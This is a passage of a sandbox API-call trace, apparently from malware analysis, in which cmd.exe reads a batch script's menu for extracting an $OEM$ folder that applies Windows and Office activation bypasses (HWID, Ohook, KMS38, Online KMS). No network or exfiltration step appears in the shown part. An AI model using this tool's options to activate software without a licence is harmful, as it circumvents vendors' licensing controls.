dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31b9 [0181.214] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.214] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12758, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d6 [0181.214] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Extract $OEM$ Folder\r\n", cbMultiByte=29, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="title Extract $OEM$ Folder\r\n any key to go back...\"\r\n") returned 29 [0181.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.214] GetFileType (hFile=0x9c) returned 0x1 [0181.214] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.214] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="mode 78, 30\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="mode 78, 30\r\nt $OEM$ Folder\r\n") returned 13 [0181.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.214] GetFileType (hFile=0x9c) returned 0x1 [0181.214] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.214] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n, 30\r\n") returned 7 [0181.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.214] GetFileType (hFile=0x9c) returned 0x1 [0181.214] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.215] GetFileType (hFile=0x9c) returned 0x1 [0181.215] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.215] GetFileType (hFile=0x9c) returned 0x1 [0181.215] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.215] GetFileType (hFile=0x9c) returned 0x1 [0181.215] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: Extract $OEM$ folder on the desktop \r\n", cbMultiByte=74, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: Extract $OEM$ folder on the desktop \r\n================================================================\r\n") returned 74 [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.215] GetFileType (hFile=0x9c) returned 0x1 [0181.215] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.215] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ________________________________________________________\r\n", cbMultiByte=74, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: ________________________________________________________\r\n") returned 74 [0181.215] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] GetFileType (hFile=0x9c) returned 0x1 [0181.216] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.216] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n ________________________________________________________\r\n") returned 7 [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] GetFileType (hFile=0x9c) returned 0x1 [0181.216] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.216] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [1] HWID\r\n", cbMultiByte=29, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [1] HWID\r\n___________________________________________\r\n") returned 29 [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] GetFileType (hFile=0x9c) returned 0x1 [0181.216] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.216] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [2] Ohook\r\n", cbMultiByte=30, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [2] Ohook\r\n__________________________________________\r\n") returned 30 [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] GetFileType (hFile=0x9c) returned 0x1 [0181.216] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.216] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [3] KMS38\r\n", cbMultiByte=30, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [3] KMS38\r\n") returned 30 [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.216] GetFileType (hFile=0x9c) returned 0x1 [0181.216] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [4] Online KMS\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [4] Online KMS\r\n_____________________________________\r\n") returned 35 [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] GetFileType (hFile=0x9c) returned 0x1 [0181.217] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n [4] Online KMS\r\n") returned 7 [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] GetFileType (hFile=0x9c) returned 0x1 [0181.217] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [5] HWID ^(Windows^) ^+ Ohook ^(Office^)\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [5] HWID ^(Windows^) ^+ Ohook ^(Office^)\r\n\r\n") returned 72 [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] GetFileType (hFile=0x9c) returned 0x1 [0181.217] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [6] HWID ^(Windows^) ^+ Online KMS ^(Office^)\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [6] HWID ^(Windows^) ^+ Online KMS ^(Office^)\r\n") returned 72 [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] GetFileType (hFile=0x9c) returned 0x1 [0181.217] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [7] KMS38 ^(Windows^) ^+ Ohook ^(Office^)\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [7] KMS38 ^(Windows^) ^+ Ohook ^(Office^)\r\n") returned 72 [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.217] GetFileType (hFile=0x9c) returned 0x1 [0181.218] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.218] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [8] KMS38 ^(Windows^) ^+ Online KMS ^(Office^)\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [8] KMS38 ^(Windows^) ^+ Online KMS ^(Office^)\r\n") returned 72 [0181.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.218] GetFileType (hFile=0x9c) returned 0x1 [0181.218] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.218] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [9] Online KMS ^(Windows^) ^+ Ohook ^(Office^)\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [9] Online KMS ^(Windows^) ^+ Ohook ^(Office^)\r\n") returned 72 [0181.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.218] GetFileType (hFile=0x9c) returned 0x1 [0181.218] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.218] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n [9] Online KMS ^(Windows^) ^+ Ohook ^(Office^)\r\n") returned 7 [0181.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.218] GetFileType (hFile=0x9c) returned 0x1 [0181.218] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.218] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color2 %_White% \" [R] \" %_Green% \"ReadMe\"\r\n", cbMultiByte=63, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color2 %_White% \" [R] \" %_Green% \"ReadMe\"\r\nffice^)\r\n") returned 63 [0181.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.218] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.218] GetFileType (hFile=0x9c) returned 0x1 [0181.218] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.218] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [0] Go Back\r\n", cbMultiByte=32, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [0] Go Back\r\n [R] \" %_Green% \"ReadMe\"\r\n") returned 32 [0181.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.219] GetFileType (hFile=0x9c) returned 0x1 [0181.219] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.219] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ________________________________________________________\r\n", cbMultiByte=74, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: ________________________________________________________\r\n") returned 74 [0181.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.219] GetFileType (hFile=0x9c) returned 0x1 [0181.219] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.219] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: \r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: \r\n ________________________________________________________\r\n") returned 9 [0181.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.219] GetFileType (hFile=0x9c) returned 0x1 [0181.219] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.219] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard:\"\r\n", cbMultiByte=86, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard:\"\r\n====================================================\r\n") returned 86 [0181.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.219] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.219] GetFileType (hFile=0x9c) returned 0x1 [0181.219] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.220] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="choice /C:123456789R0 /N\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="choice /C:123456789R0 /N\r\n \" %_Green% \"Enter a menu option in the Keyboard:\"\r\n") returned 26 [0181.220] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.220] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.220] GetFileType (hFile=0x9c) returned 0x1 [0181.220] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.220] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _erl=%errorlevel%\r\n", cbMultiByte=23, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _erl=%errorlevel%\r\nN\r\n") returned 23 [0181.220] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.220] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.220] GetFileType (hFile=0x9c) returned 0x1 [0181.220] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.220] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _erl=%errorlevel%\r\n") returned 2 [0181.220] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.220] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.220] GetFileType (hFile=0x9c) returned 0x1 [0181.220] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.220] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==11 goto:Extras\r\n", cbMultiByte=27, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==11 goto:Extras\r\n \" %_Green% \"Enter a menu option in the Keyboard:\"\r\n") returned 27 [0181.220] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.221] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.221] GetFileType (hFile=0x9c) returned 0x1 [0181.221] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.221] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==10 start %mas%oem-folder.html &goto:Extract$OEM$2\r\n", cbMultiByte=62, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==10 start %mas%oem-folder.html &goto:Extract$OEM$2\r\ntion in the Keyboard:\"\r\n") returned 62 [0181.221] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.221] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.221] GetFileType (hFile=0x9c) returned 0x1 [0181.221] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.221] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==9 (set \"_oem=Online KMS [Windows] + Ohook [Office]\" & set \"para=/KMS-ActAndRenewalTask /KMS-Windows /Ohook\" &goto:Extract$OEM$3)\r\n", cbMultiByte=141, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==9 (set \"_oem=Online KMS [Windows] + Ohook [Office]\" & set \"para=/KMS-ActAndRenewalTask /KMS-Windows /Ohook\" &goto:Extract$OEM$3)\r\n==========\r\n") returned 141 [0181.221] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.221] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.221] GetFileType (hFile=0x9c) returned 0x1 [0181.221] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.221] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==8 (set \"_oem=KMS38 [Windows] + Online KMS [Office]\" & set \"para=/KMS38 /KMS-ActAndRenewalTask /KMS-Office\" &goto:Extract$OEM$3)\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==8 (set \"_oem=KMS38 [Windows] + Online KMS [Office]\" & set \"para=/KMS38 /KMS-ActAndRenewalTask /KMS-Office\" &goto:Extract$OEM$3)\r\n\n") returned 140 [0181.221] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.221] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.221] GetFileType (hFile=0x9c) returned 0x1 [0181.221] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.221] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==7 (set \"_oem=KMS38 [Windows] + Ohook [Office]\" & set \"para=/KMS38 /Ohook\" &goto:Extract$OEM$3)\r\n", cbMultiByte=107, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==7 (set \"_oem=KMS38 [Windows] + Ohook [Office]\" & set \"para=/KMS38 /Ohook\" &goto:Extract$OEM$3)\r\nMS-Office\" &goto:Extract$OEM$3)\r\n") returned 107 [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] GetFileType (hFile=0x9c) returned 0x1 [0181.222] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.222] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==6 (set \"_oem=HWID [Windows] + Online KMS [Office]\" & set \"para=/HWID /KMS-ActAndRenewalTask /KMS-Office\" &goto:Extract$OEM$3)\r\n", cbMultiByte=138, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==6 (set \"_oem=HWID [Windows] + Online KMS [Office]\" & set \"para=/HWID /KMS-ActAndRenewalTask /KMS-Office\" &goto:Extract$OEM$3)\r\n\r\n") returned 138 [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] GetFileType (hFile=0x9c) returned 0x1 [0181.222] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.222] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==5 (set \"_oem=HWID [Windows] + Ohook [Office]\" & set \"para=/HWID /Ohook\" &goto:Extract$OEM$3)\r\n", cbMultiByte=105, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==5 (set \"_oem=HWID [Windows] + Ohook [Office]\" & set \"para=/HWID /Ohook\" &goto:Extract$OEM$3)\r\nMS-Office\" &goto:Extract$OEM$3)\r\n") returned 105 [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c 